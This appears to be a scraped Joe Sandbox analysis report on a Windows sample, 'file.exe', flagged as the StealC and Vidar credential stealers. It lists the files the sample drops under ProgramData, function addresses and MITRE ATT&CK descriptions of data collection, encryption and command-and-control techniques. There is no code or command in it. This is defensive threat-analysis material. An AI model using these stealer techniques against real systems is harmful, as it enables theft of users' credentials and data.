Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\FIEHIIIJDAAAAAAKECBFBAEBKJ

C:\ProgramData\HCFIJKKK

C:\ProgramData\HCFIJKKKKKFCAAAAFBKF

C:\ProgramData\HCFIJKKKKKFCAAAAFBKFIECAAK

C:\ProgramData\HIDGCFBFBFBKEBGCAFCG

C:\ProgramData\IJDHCBGHJEGHJJKFHIIEHJJEBF

C:\ProgramData\IJKFCFHJ

C:\ProgramData\KKKJKEBKFCAAECAAAAAE

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00379860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 003645C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0036BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 00374910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00379C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00367710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00370250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00365100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Function 0036A790 Relevance: 39.0, APIs: 21, Strings: 1, Instructions: 539
stringmemoryfileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre